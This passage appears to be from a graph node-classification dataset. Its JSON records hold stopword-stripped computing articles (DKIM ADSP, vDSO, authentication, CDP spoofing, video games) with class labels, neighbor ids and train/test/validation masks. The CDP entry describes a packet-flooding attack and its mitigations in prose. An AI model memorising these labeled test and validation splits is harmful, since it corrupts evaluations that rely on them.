    "text": "Author_Domain_Signing_Practices:author domain signing practices computing author domain signing practices adsp optional extension dkim e-mail authentication scheme whereby domain publish signing practices adopts relaying mail behalf associated authors adsp adopted standards track rfc 5617 august 2009 declared historic november 2013 ... almost deployment use 4 years since ... author address one specified header field defined rfc 5322 unusual cases one address defined field rfc 5322 provides sender field used instead domains 5322- addresses necessarily elaborated purported responsible address covered sender id specified rfc 4407 domain 5322- address also necessarily envelope sender address defined rfc 5321 also known smtp mail envelope- 5321- return-path optionally protected spf specified rfc 7208 author domain signature valid dkim signature domain name dkim signing entity i.e. tag dkim-signature header field domain name author address binding recognizes higher value author domain signatures valid signatures may happen found message fact proves entity controls dns zone author — hence also destination replies message author — relayed author message likely author submitted message proper message submission agent message qualification verified independently published domain signing practice practices published dns record author domain author address john.doe example.com may set three possible signing practices provided adsp specification explicitly discourages publishing record different unknown domains independent users usage policy explicitly restrict sending mail designated mail servers since mail sent independently organization signed however explicitly caveat worded straightforward understand purpose limitations adsp one adsp authors holds better publish private lists discardable domains maintained competent people rather letting domain state policy recognizing spec shipped untested prototype author popular adsp implementation proposed downgrade adsp experimental status later actually downgraded historical consideration dmarc covers less use case influential tied time adsp known asp author signing practices original ssp sender signing practices protocol naming poll domainkeys dkim predecessor outbound signing policy consisting single character domain signs email otherwise dkim intentionally avoided signers policies considerations dkim validate message field directly policy-neutral authentication protocol association signer right use field visible end users deferred separate specification eric allman author sendmail editor adsp specification ietf dkim working group draft adsp specification started june 2007 went 11 revisions lengthy discussion published rfc august 2009 declared historic four years later november 2013 ... almost deployment use 4 years since ...",
    "neighbors": [
      2848,
      8130,
      1125,
      2887,
      8202,
      8332,
      8337,
      9909,
      472,
      4793
    ],
    "mask": "None"
  },
  {
    "node_id": 5422,
    "label": 3,
    "text": "King's_Knight:king knight game became square first north american release redmond subsidiary squaresoft first release independent company 1986 release title screen credits workss programming king knight saw second release 1987 nec pc-8801mkii sr sharp x1 versions game retitled king knight special released exclusively japan first game designed hironobu sakaguchi famicom nobuo uematsu provided musical score king knight uematsu third work video game music composition king knight follows basic storyline many nes-era role-playing video games displayed princess claire olthea kidnapped kingdom izander player must choose one four heroes knight/warrior ray jack wizard kaliva monster/gigant barusa kid thief toby train set forth attack gargatua castle defeat evil dragon tolfida rescue princess king knight vertically scrolling shooter main objective dodge destroy onscreen enemies obstacles various items however add depth game character player collect various power-ups increase character level maximum twenty levels per character many seven jump increases seven speed increases three weapon increases three shield increases also life ups collected increase character life meter also life downs avoided onscreen icons affect stage hidden cave entrances/exits secret revealer reveals hidden stones block progress finally four types elements collected level vital completion last stage elements simply elements b c d. stage various power-ups element type cave caves given level always house least one element type mention various powerups vital player finds caves always hidden generally found middle stage caves also statues shoot fireballs end cave dragon fight dragon defeated player exit cave continue level differences present famicom msx versions king knight japanese north american versions well japanese famicom version american nes version king knight differed little title screen disparity title screen reflected copyright publisher msx version king knight differed famicom version variety ways opening modified prior intro screen players could specify type controller would like use either keyboard joystick in-game dynamics similar although differences exist msx version flanks screen closed stage maps moved slightly items appear original locations finally msx version may seem easier characters sustain damage attacks developers also took advantage technological capabilities available msx upgrade msx port featured sound channels famicom many music tracks sound effects altered improved msx version also boasts wider range colors updated graphics new monster boss designs dragons end caves example replaced lizard-like monsters new sidebar displayed player life meter allocated power-ups allocated elements msx could smoothly render vertical scrolling – unlike famicom – movement graphics choppy comparison changes similar changes took place square final fantasy ported msx2 september 18 2016 square enix announced remake titled king knight wrath dark dragon ios android produced daisuke motohashi developed flame hearts developed mobile spin-off associated final fantasy xv game borrows original version scrolling action role-playing game style adds new camera perspective orchestral version former chiptune soundtrack game free-to-play four-player multiplayer mode square enix announced game september 2016 tokyo game show promotional material placed game final fantasy xv universe alongside justice monsters five another mobile companion game series square enix announced earlier 2016 king knight wrath dark dragon planned release android ios platforms japan 2016 announcement north american release game release postponed 2017 released worldwide september 13 2017 end service subsequently announced game take place june 26 2018 less year worldwide release king knight one video games adapted manga titled published gamest comics collection april 1999 drawn kouta hirano king knight given 3/10 ign 3/10 well nintendo life",
    "neighbors": [
      10931,
      5436,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 5423,
    "label": 4,
    "text": "CESG_Listed_Adviser_Scheme:cesg listed adviser scheme cesg listed adviser scheme programme run cesg provide pool information assurance consultants government departments public-sector bodies uk clas consultants advised systems handle protectively marked information including secret instance may advised gsi accreditation clas consultants held security clearance least sc clas consultants developed risk assessments line is1 risk management accreditation document sets rmads line is2 2011 entry clas closed replacement system designed 2013 'new clas implemented open membership 'new clas required members cesg certified professionals clas closed january 2016 cesg certified professional ccp scheme recognises expertise working information assurance cyber security arenas government industry sets standard ia professionals working sector provides rigorous independent assessment competence ia professionals ccp status endorsement ia expertise confirms information risk support business managed balanced pragmatic way clas closed ccp cesg-approved credential applies individual professionals rather companies",
    "neighbors": [
      7979,
      691,
      11172,
      4595
    ],
    "mask": "None"
  },
  {
    "node_id": 5424,
    "label": 4,
    "text": "Mollom:mollom mollom web service analyzed quality content posted websites included comments contact-form messages blogs forum posts mollom screened contributions posted participating websites mollom originally developed dries buytaert also founder lead developer drupal cms used three specific technologies detect spam malicious content machine learning text analytics captcha according acquia mollom launch march 2008 acquisition acquia august 2012 mollom blocked one billion spam messages customers including sony music stanford university twitter mollom acquired acquia august 2012 april 27 2017 company announced would stop sale mollom service may 1 2017 service shut completely april 2 2018 blocked 13.5 billion spam comments since inception",
    "neighbors": [
      519
    ],
    "mask": "Test"
  },
  {
    "node_id": 5425,
    "label": 2,
    "text": "IBMDOS.COM:ibmdos.com ibmdos.com filename dos kernel loaded initially invoked dos bios ibmbio.com boot process contains hardware-independent parts operating system including embedded fat12 fat16 newer versions fat32 file system code well code provide dos api applications file exists pc dos 1.0 7.10 dr dos 5.0 higher except dr-dos 7.06 ms-dos using msdos.sys version 1.10 6.22 purpose dr dos 3.31 3.41 used equivalent drbdos.sys file instead compatibility purposes dos applications ibmdos.com file name briefly also used ibm version os/2 1.0 resembled os2dos.com os/2 kernel file used microsoft default file located root directory bootable drive/partition normally c hidden read-only system file attributes set ibmdos.com binary image containing executable code rather true com-style program hidden attribute set keep file accidentally invoked command prompt would lead crash necessary dr-dos 7.02 higher systems file fat binary also containing tiny com-style stub displaying version info exiting gracefully loaded inappropriately digital research terminology kernel component operating system called bdos basic disk operating system term originally coined gary kildall 1975 cp/m continued used dri operating systems except concurrent dos 286 flexos microsoft used name well referring kernel msx-dos operating system fat file system specific code called fdos dri terminology",
    "neighbors": [
      9762,
      4548,
      5220,
      5158,
      6148,
      6921,
      8301,
      9166,
      7983,
      178,
      3314,
      9972,
      4409,
      954,
      2811
    ],
    "mask": "None"
  },
  {
    "node_id": 5426,
    "label": 4,
    "text": "Karen_Todner:karen todner karen elizabeth todner born april 1962 nuneaton england british solicitor clients include hacker ryan cleary linked lulzsec gary mckinnon known pentagon hacker lauri love todner qualified solicitor 1987 20s became founding member kaim todner llp law firm london kaim todner solicitors formed 1990 specialising criminal law particular expertise extradition beginning march 2016 todner practise acquired one legal alternative business structure originally set 2013 came shortly todner announced intention close practice due legal aid cuts since acquisition one legal todner firm kaim todner continued operating name part one legal alternative business structure todner commented delighted secured way firm continue working present format umbrella one legal karen left kaim todner one legal september 2017 found www.karentodner.com todner appeared number extradition cases early case successful defence gary mckinnon set new legal precedent british law mckinnon legal team applied judicial review home secretary rejection medical evidence stated could easily tried uk unnecessary cruel inhumane inflict stress removing homeland family medical support network starting winter 2013 todner started representing lauri love british student arrested suspicion hacking us military computers love accused committing cyber attacks part hacktivist campaign 2012 2013 protest death aaron swartz computer programmer committed suicide facing 35 years us prison charges computer misuse september 2016 decision made extradite love us todner said confident appeal 100 mps showed support love campaign extradition order overturned health grounds october 2016 announced mp barry sheerman chair parliamentary commission autism write president obama asking throw extradition request leaves office january 2017 wednesday 12 october 2016 house commons prime ministers questions david burrowes mp raised case lauri love issues difficulties faced various forms autism come contact justice system others including national autistic society liberty courage foundation showed support love appeal 24 october 105 cross-party backbenchers signed letter president obama raising deep concern safety lauri love pointing long history serious mental health issues depression episodes psychosis november 2016 home secretary amber rudd backed decision extradite love america todner stated fears driven suicide extradited lodging appeal home office decision letter home office opposing love extradition risk suicide wrote we.. urge recognise seriousness mr love mental illness withdraw request extradition permit prosecution proceed england mr love would able stand trial bail support close family medical support network love said home secretary refused send us trial called home secretary decision extradite ‘ aberration justice ’ legal team kaim todner solicitors pointed uk citizen accused hacking extradited us todner also stated home secretary refused extradite love uk–us extradition treaty 2003 unfair repealed 25 april 2017 high court accepted love appeal extradition lodged todner behalf hearing date yet set however todner commented reason permission granted high court acknowledge grounds raised issues great importance delighted news lauri continue everything ensure prevention extradition united states america starting 2012 todner represented david mcintyre queen lancashire regiment soldier war veteran served afghanistan bosnia northern ireland iraq mclntyre accused overcharging us peace group security contract running firm employed team 20 provide security american clients including iraqi ambassador us overcharging us government security services baghdad iraq mcintyre left army 2002 set security company called quantum risk eight counts fraud mcintyre charged relate claims overcharged us peace group security contract running quantum risk december 2008 july 2009 mcintyre business closed 2009 followed enrolment royal military police served afghanistan july 2012 mcintyre arrested uniform operational setting afghanistan flown country 45 minutes later appeared westminster magistrates court london 36 hours later mcintyre faced eight counts fraud concerning contract united states institute peace usip alleged overcharged organisation 100,000 us dollars £65,000 us extradition request approved home secretary theresa may mcintyre appealed submitting report british army consultant psychiatrist confirming suffered ptsd todner commented firm consider detail secretary state conclusion see whether seek judicial review decision",
    "neighbors": [
      9240,
      5385,
      11659
    ],
    "mask": "Test"
  },
  {
    "node_id": 5427,
    "label": 4,
    "text": "Ekoparty:ekoparty ekoparty annual computer security conference brings together variety people interested information security briefings take place regularly buenos aires argentina ekoparty founded 2001 juan pablo daniel borgna leonardo pigner federico kirschbaum jerónimo basaldúa francisco amato addition talks ekoparty different activities like workshops wargames wardriving lockpicking challenges forensics challenges",
    "neighbors": [
      2275,
      9319,
      7222,
      7449,
      3707,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5428,
    "label": 9,
    "text": "TACPOL_(programming_language):tacpol programming language tacpol tactical procedure oriented language block structured programming language developed united states army tacfire tactical fire direction command control application tacpol similar pl/i unlike pl/i tacpol keywords—called particles —are reserved words used identifiers roughly 100 reserved words tacpol identifiers length longer eight characters first five concatenated last three characters actually used tacpol supports fixed-point binary numeric data fixed-length character strings 512 bytes fixed-length bit strings 32 bits support floating point numeric data pointers arrays may three dimensions dynamic bounds permitted additional types records called groups limited single level nesting tables arrays groups unions called cells control structures include if-then-else iteration case statements procedures may value parameters quantity parameters – reference without type-checking parameterless procedure label parameters tacpol compiler ran generated code an/gyk-12 militarized version litton industries l-3050 32-bit minicomputer",
    "neighbors": [
      8262,
      1611,
      428,
      721,
      6102,
      8502
    ],
    "mask": "None"
  },
  {
    "node_id": 5429,
    "label": 9,
    "text": "Pvts:pvts pilo visual tools scheme pvts basic interpreter implementation visualization tools scheme programming language developed rollins college written java pvts contains interpreter also known read-eval-print loop well three visualization modules global environment viewer function call viewer data structure viewer pvts free software licensed gnu general public license gpl available online pvts limited interpreter capabilities cover r5rs standard scheme language standard purpose software display graphically scheme code aid students learning language",
    "neighbors": [
      10083,
      8262,
      5612,
      5677,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 5430,
    "label": 2,
    "text": "Linux_Assigned_Names_and_Numbers_Authority:linux assigned names numbers authority linux assigned names numbers authority lanana central registry names numbers used within linux created 2000 h. peter anvin 2013 along filesystem hierarchy standard matters moved linux standard base operates linux foundation auspices per russ herrold linux device list created 1992 rick miller maintained 1993 1995 adopted h. peter anvin 2000 created lanana maintain list similar lists future name registry playful reference iana central registry names numbers used internet 2002 lanana became official workgroup free standards group",
    "neighbors": [
      7938,
      7812,
      8326,
      4360,
      4493,
      2195,
      11155,
      1813,
      10780,
      1694,
      3618,
      4011,
      9646,
      8631,
      823,
      9660,
      10817,
      5067,
      8147,
      1761,
      4841
    ],
    "mask": "None"
  },
  {
    "node_id": 5431,
    "label": 2,
    "text": "Android_Automotive:android automotive android automotive variation google android operating system tailored use vehicle dashboards introduced march 2017 platform developed google intel together car manufacturers volvo audi project aims provide operating system codebase vehicle manufacturers develop version operating system besides infotainment tasks messaging navigation music playback operating system aims handle vehicle-specific functions controlling air conditioning contrarily android auto android automotive full operating system running vehicle device relying external device operate operating system first announced google march 2017 february 2018 polestar volvo ’ brand electric performance cars announced polestar 2 first car built-in android automotive expected release 2020 april 2019 google opened apis developers start developing applications android automotive",
    "neighbors": [
      4096,
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      3633,
      1083,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8821,
      11391,
      1670,
      7816,
      5262,
      6800,
      11408,
      10393,
      8858,
      7835,
      673,
      7841,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      10445,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      7926,
      3836,
      5892,
      7428,
      8455,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      3380,
      2875,
      3900,
      10045,
      11590,
      11592,
      11082,
      332,
      9039,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      1409,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      4044,
      4048,
      2001,
      479,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5432,
    "label": 2,
    "text": "VDSO:vdso vdso virtual dynamic shared object kernel mechanism exporting carefully selected set kernel space routines user space applications applications call kernel space routines in-process without incurring performance penalty context switch inherent calling kernel space routines means system call interface vdso developed offer vsyscall features overcoming limitations small amount statically allocated memory allows 4 system calls addresses abi process compromises security security issue mitigated emulating virtual system call emulation introduces additional latency vdso uses standard mechanisms linking loading i.e standard executable linkable format elf format vdso memory area allocated user space exposes kernel functionalities vdso dynamically allocated offers improved safety memory space randomization supports 4 system calls vdso links provided via glibc library kernel vdso support traditional syscall made vdso helps reduce calling overhead simple kernel routines also work way select best system-call method computer architectures ia-32 advantage methods exported routines provide proper dwarf debug attributed record format debugging information implementation generally implies hooks dynamic linker find vdsos",
    "neighbors": [
      10016,
      9921,
      642,
      5380,
      8966,
      6664,
      5492,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 5433,
    "label": 4,
    "text": "Authentication:authentication authentication authentikos real genuine αὐθέντης authentes author act proving assertion identity computer system user contrast identification act indicating person thing identity authentication process verifying identity might involve validating personal identity documents verifying authenticity website digital certificate determining age artifact carbon dating ensuring product document counterfeit authentication relevant multiple fields art antiques anthropology common problem verifying given artifact produced certain person certain place period history computer science verifying user identity often required allow access confidential data systems authentication considered three types first type authentication accepting proof identity given credible person first-hand evidence identity genuine authentication required art physical objects proof could friend family member colleague attesting item provenance perhaps witnessed item creator possession autographed sports memorabilia could involve someone attesting witnessed object signed vendor selling branded items implies authenticity may evidence every step supply chain authenticated centralized authority-based trust relationships back secure internet communication known public certificate authorities decentralized peer-based trust also known web trust used personal services email files pretty good privacy gnu privacy guard trust established known individuals signing cryptographic key key signing parties instance second type authentication comparing attributes object known objects origin example art expert might look similarities style painting check location form signature compare object old photograph archaeologist hand might use carbon dating verify age artifact chemical spectroscopic analysis materials used compare style construction decoration artifacts similar origin physics sound light comparison known physical environment used examine authenticity audio recordings photographs videos documents verified created ink paper readily available time item implied creation attribute comparison may vulnerable forgery general relies facts creating forgery indistinguishable genuine artifact requires expert knowledge mistakes easily made amount effort required considerably greater amount profit gained forgery art antiques certificates great importance authenticating object interest value certificates however also forged authentication poses problem instance son han van meegeren well-known art-forger forged work father provided certificate provenance well see article jacques van meegeren criminal civil penalties fraud forgery counterfeiting reduce incentive falsification depending risk getting caught currency financial instruments commonly use second type authentication method bills coins cheques incorporate hard-to-duplicate physical features fine printing engraving distinctive feel watermarks holographic imagery easy trained receivers verify third type authentication relies documentation external affirmations criminal courts rules evidence often require establishing chain custody evidence presented accomplished written evidence log testimony police detectives forensics staff handled antiques accompanied certificates attesting authenticity signed sports memorabilia usually accompanied certificate authenticity external records problems forgery perjury also vulnerable separated artifact lost computer science user given access secure systems based user credentials imply authenticity network administrator give user password provide user key card access device allow system access case authenticity implied guaranteed consumer goods pharmaceuticals perfume fashion clothing use three forms authentication prevent counterfeit goods taking advantage popular brand reputation damaging brand owner sales reputation mentioned item sale reputable store implicitly attests genuine first type authentication second type authentication might involve comparing quality craftsmanship item expensive handbag genuine articles third type authentication could presence trademark item legally protected marking identifying feature aids consumers identification genuine brand-name goods software companies taken great steps protect counterfeiters including adding holograms security rings security threads color shifting ink ways someone may authenticated fall three categories based known factors authentication something user knows something user something user authentication factor covers range elements used authenticate verify person identity prior granted access approving transaction request signing document work product granting authority others establishing chain authority security research determined positive authentication elements least two preferably three factors verified three factors classes elements factor weakest level authentication single component one three categories factors used authenticate individual ’ identity use one factor offer much protection misuse malicious intrusion type authentication recommended financial personally relevant transactions warrant higher level security multi-factor authentication involves two authentication factors something know something something two-factor authentication special case multi-factor authentication involving exactly two factors example using bankcard something user along pin something user knows provides two-factor authentication business networks may require users provide password knowledge factor pseudorandom number security token ownership factor access very-high-security system might require mantrap screening height weight facial fingerprint checks several inherence factor elements plus pin day code knowledge factor elements still two-factor authentication frequent types authentication available use authenticating online users differ level security provided combining factors one three categories factors authentication u.s. government national information assurance glossary defines strong authentication layered authentication approach relying two authenticators establish identity originator receiver information european central bank ecb defined strong authentication procedure based two three authentication factors factors used must mutually independent least one factor must non-reusable non-replicable except case inherence factor must also incapable stolen internet european well us-american understanding strong authentication similar multi-factor authentication 2fa exceeding rigorous requirements fast identity online fido alliance striving establish technical specifications strong authentication conventional computer systems authenticate users initial log-in session cause critical security flaw resolve problem systems need continuous user authentication methods continuously monitor authenticate users based biometric trait study used behavioural biometrics based writing styles continuous authentication method recent research shown possibility using smartphones ’ sensors accessories extract behavioral attributes touch dynamics keystroke dynamics gait recognition attributes known behavioral biometrics could used verify identify users implicitly continuously smartphones authentication systems built based behavioral biometric traits known active continuous authentication systems term digital authentication also known electronic authentication refers group processes confidence user identities established presented via electronic methods information system also referred e-authentication digital authentication process creates technical challenges need authenticate individuals entities remotely network american national institute standards technology nist created generic model digital authentication describes processes used accomplish secure authentication authentication information pose special problems electronic communication vulnerability man-in-the-middle attacks whereby third party taps communication stream poses two communicating parties order intercept information extra identity factors required authenticate party identity counterfeit products often offered consumers authentic counterfeit consumer goods electronics music apparel counterfeit medications sold legitimate efforts control supply chain educate consumers help ensure authentic products sold used even security printing packages labels nameplates however subject counterfeiting secure key storage device used authentication consumer electronics network authentication license management supply chain management etc generally device authenticated needs sort wireless wired digital connection either host system network nonetheless component authenticated need electronic nature authentication chip mechanically attached read connector host e.g authenticated ink tank use printer products services secure coprocessors applied offer solution much difficult counterfeit options time easily verified packaging labeling engineered help reduce risks counterfeit consumer goods theft resale products package constructions difficult copy pilfer-indicating seals counterfeit goods unauthorized sales diversion material substitution tampering reduced anti-counterfeiting technologies packages may include authentication seals use security printing help indicate package contents counterfeit subject counterfeiting packages also include anti-theft devices dye-packs rfid tags electronic article surveillance tags activated detected devices exit points require specialized tools deactivate anti-counterfeiting technologies used packaging include literary forgery involve imitating style famous author original manuscript typewritten text recording available medium packaging – anything box e-mail headers help prove disprove authenticity document however text audio video copied new media possibly leaving informational content use authentication various systems invented allow authors provide means readers reliably authenticate given message originated relayed involve authentication factors like opposite problem detection plagiarism information different author passed person work common technique proving plagiarism discovery another copy similar text different attribution cases excessively high quality style mismatch may raise suspicion plagiarism literacy authentication readers ’ process questioning veracity aspect literature verifying questions via research fundamental question authentication literature – one believe related authentication project therefore reading writing activity students documents relevant research process builds students critical literacy documentation materials literature go beyond narrative texts likely include informational texts primary sources multimedia process typically involves internet hands-on library research authenticating historical fiction particular readers consider extent major historical events well culture portrayed e.g. language clothing food gender roles believable period historically fingerprints used authoritative method authentication court cases us elsewhere raised fundamental doubts fingerprint reliability outside legal system well fingerprints shown easily spoofable british telecom top computer-security official noting fingerprint readers already tricked one spoof another hybrid two-tiered authentication methods offer compelling solution private keys encrypted fingerprint inside usb device computer data context cryptographic methods developed see digital signature challenge-response authentication currently spoofable originator key compromised originator anyone attacker knows n't know compromise irrelevant known whether cryptographically based authentication methods provably secure since unanticipated mathematical developments may make vulnerable attack future occur may call question much authentication past particular digitally signed contract may questioned new attack cryptography underlying signature discovered process authorization distinct authentication whereas authentication process verifying say authorization process verifying permitted trying mean authorization presupposes authentication anonymous agent could authorized limited action set one familiar use authentication authorization access control computer system supposed used authorized must attempt detect exclude unauthorized access therefore usually controlled insisting authentication procedure establish degree confidence identity user granting privileges established identity",
    "neighbors": [
      2050,
      5636,
      7,
      519,
      8202,
      8203,
      6159,
      9744,
      9745,
      531,
      8211,
      1557,
      7192,
      2080,
      9248,
      10274,
      2083,
      2084,
      10790,
      2087,
      6184,
      1069,
      7729,
      10801,
      2099,
      1588,
      4663,
      5178,
      6204,
      3133,
      9791,
      10815,
      4163,
      2118,
      6220,
      10831,
      5200,
      1618,
      4691,
      10325,
      8283,
      7260,
      6750,
      2143,
      9313,
      7268,
      10341,
      8295,
      107,
      7794,
      4725,
      5749,
      9336,
      4221,
      5245,
      5246,
      8317,
      10880,
      8838,
      8839,
      9356,
      4242,
      6805,
      6811,
      8859,
      3742,
      3231,
      7327,
      10915,
      2213,
      7846,
      10918,
      1709,
      7855,
      2737,
      2227,
      2228,
      9909,
      7352,
      7354,
      700,
      190,
      3262,
      3264,
      7368,
      8904,
      8905,
      5325,
      6350,
      2262,
      6360,
      2274,
      4323,
      6373,
      6888,
      9967,
      8432,
      241,
      755,
      11507,
      6904,
      11001,
      6907,
      10492,
      4349,
      5373,
      4863,
      2818,
      9488,
      1297,
      8978,
      5910,
      10232,
      4892,
      1821,
      4893,
      5404,
      5405,
      5918,
      1314,
      8998,
      11046,
      3886,
      3887,
      3377,
      820,
      1845,
      3381,
      8504,
      6970,
      5435,
      6975,
      2887,
      4935,
      2889,
      10058,
      9038,
      4435,
      4439,
      7515,
      4956,
      11611,
      865,
      3941,
      4453,
      4965,
      9576,
      361,
      2928,
      5490,
      4979,
      895,
      899,
      2947,
      4485,
      9607,
      904,
      10631,
      11660,
      6541,
      3984,
      3477,
      3480,
      2975,
      8095,
      929,
      6563,
      9635,
      9125,
      2470,
      9640,
      1449,
      1961,
      939,
      4009,
      9646,
      6064,
      11185,
      6579,
      10163,
      10677,
      1978,
      10170,
      957,
      11198,
      6591,
      5568,
      3521,
      3525,
      9160,
      7626,
      8657,
      6098,
      5077,
      1496,
      9688,
      474,
      8670,
      10207,
      8674,
      1511,
      2027,
      1516,
      9196,
      2030,
      11244,
      1012,
      5108,
      8694,
      503,
      5624,
      6651,
      6141,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5434,
    "label": 4,
    "text": "CDP_Spoofing:cdp spoofing computer networking cdp spoofing technique employed compromise operation network devices use cisco discovery protocol cdp discovering neighboring devices cdp spoofing network security threat mitigated taking precautionary measures order prevent cisco discovery protocol cdp created computer networking company cisco originally developed 1994 original intent make easier find devices network cdp may used cisco routers switches network equipment advertise software version capabilities ip address two versions cdp cdpv1 cdpv2 cdpv1 original version involved finding basic information networking devices devices able receive information networking device directly connected cdpv2 predecessor first version extensive previous version includes utilities checking errors made configuring two devices e.g configuring mismatched native vlans cdp enabled globally default cisco routers switches servers protocol disabled globally however disabled interface encapsulation changed re-enabled interface protocol often used aid network administrators finding discovering devices easier devices discovered easier help certain network problems device arrangement network management networking tasks although beneficial features attackers accumulate information devices leaves device type ip address ios version exposed vulnerable attackers use information mimic devices steal information create various network problems recommended disable cdp entire device rather interfaces fully mitigate threat cdp spoofing attacks cdp suggest disabling cdp used device necessity device although cdp enabled default disabled re-enabled globally interfaces command syntaxhighlight config cdp run /syntaxhighlight disable globally syntaxhighlight config cdp run /syntaxhighlight enable certain interface syntaxhighlight config-if cdp enable /syntaxhighlight disable certain interface syntaxhighlight config-if cdp enable /syntaxhighlight table display whether device established connection another device devices syntaxhighlight device name show cdp neighbors /syntaxhighlight note command show names devices ports connecting devices model name/number features device show traffic passed cdp devices syntaxhighlight device name show cdp traffic /syntaxhighlight commands help mitigate detect cdp attacks cdp spoofing also help discover flaws within system e.g mismatched native vlans could inhibiting connection devices router running cdp receives cdp packet begins build table shows neighboring devices discovered devices discovered intermittently send packet updated information packet contains various information interface ’ device ’ types names packets sent cdp encrypted creating messages devices easily read plain-text cdp spoofing creation forged packets impersonate devices either real arbitrary attack type denial-of-service dos attack used flood connected devices using cdp attacker exploit functionality sending thousands spoofed cdp packets 01:00:0c cc cc cc fill neighbor tables devices network running cdp happens traffic network may dropped device resources necessary route device command line interface may also become unresponsive making difficult disable cdp ongoing attack administrators may disable cdp result make network secure cost able benefit cdp",
    "neighbors": [
      2409,
      6834,
      3629,
      11321
    ],
    "mask": "None"
  },
  {
    "node_id": 5435,
    "label": 4,
    "text": "Login:login computer security logging logging signing signing process individual gains access computer system identifying authenticating user credentials typically form username matching password credentials sometimes referred login logon sign-in sign-on practice modern secure systems also often require second factor extra security access longer needed user log log sign sign logging usually used enter specific page trespassers see user logged login token may used track actions user taken connected site logging may performed explicitly user taking actions entering appropriate command clicking website link labeled also done implicitly user powering workstation closing web browser window leaving website refreshing webpage within defined period case websites use cookies track sessions user logs session-only cookies site usually deleted user computer addition server invalidates associations session making session-handle user cookie store useless feature comes handy user using public computer computer using public wireless connection security precaution one rely implicit means logging system especially public computer instead one explicitly log wait confirmation request taken place logging computer leaving common security practice preventing unauthorized users tampering also people choose password-protected screensaver set activate period inactivity requiring user re-enter login credentials unlock screensaver gain access system different methods logging may via image fingerprints eye scan password oral textual input etc terms became common time sharing systems 1960s bulletin board systems bbs 1970s early home computers personal computers generally require windows nt os/2 linux 1990s noun login comes verb log analogy verb clock computer systems keep log users access system term log comes chip log historically used record distance travelled sea recorded ship log log book sign connotes idea based analogy manually signing log visitors book agreed difference meaning three terms login logon sign different technical communities tend prefer one another – unix novell linux apple typically using login apple style guide saying users log file server log ... contrast microsoft style guides traditionally suggested opposite prescribed log logon past microsoft reserved sign accessing internet windows 8 onwards moved sign terminology local authentication",
    "neighbors": [
      8197,
      4750,
      3343,
      8976,
      273,
      25,
      4505,
      3867,
      4893,
      7965,
      11680,
      929,
      3362,
      5287,
      7207,
      4009,
      3371,
      1069,
      2222,
      1790,
      2737,
      10673,
      11188,
      3381,
      6837,
      823,
      8504,
      5433,
      7994,
      7739,
      700,
      1350,
      4298,
      7893,
      1622,
      87,
      93,
      10592,
      3041,
      8417,
      4579,
      8418,
      9699,
      4198,
      10341,
      107,
      10989,
      7150,
      2801,
      4850,
      5108,
      888,
      5114,
      637,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 5436,
    "label": 3,
    "text": "Final_Fantasy_(video_game):final fantasy video game final fantasy fantasy role-playing video game developed published square 1987 first game square final fantasy series created hironobu sakaguchi originally released nes final fantasy remade several video game consoles frequently packaged final fantasy ii video game collections story follows four youths called light warriors carry one world four elemental orbs darkened four elemental fiends together quest defeat evil forces restore light orbs save world final fantasy originally conceived working title fighting fantasy trademark issues dire circumstances surrounding square well sakaguchi prompted name changed game great commercial success received generally positive reviews spawned many successful sequels supplementary titles form final fantasy series original regarded one influential successful role-playing games nintendo entertainment system playing major role popularizing genre critical praise focused game graphics criticism targeted time spent wandering search random battle encounters raise player experience level march 2003 versions final fantasy sold combined total two million copies worldwide final fantasy four basic game modes overworld map town dungeon maps battle screen menu screen overworld map scaled-down version game fictional world player uses direct characters various locations primary means travel across overworld foot ship canoe airship become available player progresses exception battles preset locations bosses enemies randomly encountered field maps overworld map traveling foot canoe ship must either fought fled game plot develops player progresses towns dungeons town citizens offer helpful information others shops sell items equipment dungeons appear areas include forests caves mountains swamps underwater caverns buildings dungeons often treasure chests containing rare items available stores game menu screen allows player keep track experience points levels choose equipment characters wield use items magic character basic attribute level range one fifty determined character amount experience gaining level increases character attributes maximum hit points hp represents character remaining health character dies reach zero hp characters gain experience points winning battles combat final fantasy menu-based player selects action list options attack magic item battles turn-based continue either side flees defeated player party wins character gain experience gil flees returned map screen every character party dies game unsaved progress lost final fantasy first game show player characters right side screen enemies left side screen opposed first-person view player begins game choosing four characters form party locked choice duration game character occupation character class different attributes abilities either innate acquired six classes fighter thief black belt red mage white mage black mage later game player option character undergo class upgrade whereby sprite portraits mature classes gain ability use weapons magic previously could use game contains variety weapons armor items bought found make characters powerful combat character eight inventory slots four hold weapons four hold armor character class restrictions weapons armor may use weapons armor magical used combat cast spells magical artifacts provide protection certain spells shops characters buy items help recover traveling items available include potions heal characters remove ailments like poison petrification tents cabins used world map heal player optionally save game houses also recovers party magic saving special items may gained quests magic common ability game several character classes use spells divided two groups white defensive healing black debilitating destructive magic bought white black magic shops assigned characters whose occupation allows use spells classified level one eight four white four black spells per level character may learn three spells per level white black mages potentially learn respective spells red mages ninja knight use high-level magic final fantasy takes place fantasy world three large continents elemental powers world determined state four crystals governing one four classical elements earth fire water wind world final fantasy inhabited numerous races including humans elves dwarves mermaids dragons robots non-human races one town game although individuals sometimes found human towns areas well four hundred years prior start game lefeinish people used power wind craft airships giant space station called floating castle game watched country decline wind crystal went dark two hundred years later violent storms sank massive shrine served center ocean-based civilization water crystal went dark earth crystal fire crystal followed plaguing earth raging wildfires devastating agricultural town melmond plains vegetation decayed time later sage lukahn tells prophecy four light warriors come save world time darkness game begins appearance four youthful light warriors heroes story carry one darkened orbs initially light warriors access kingdom coneria ruined temple fiends warriors rescue 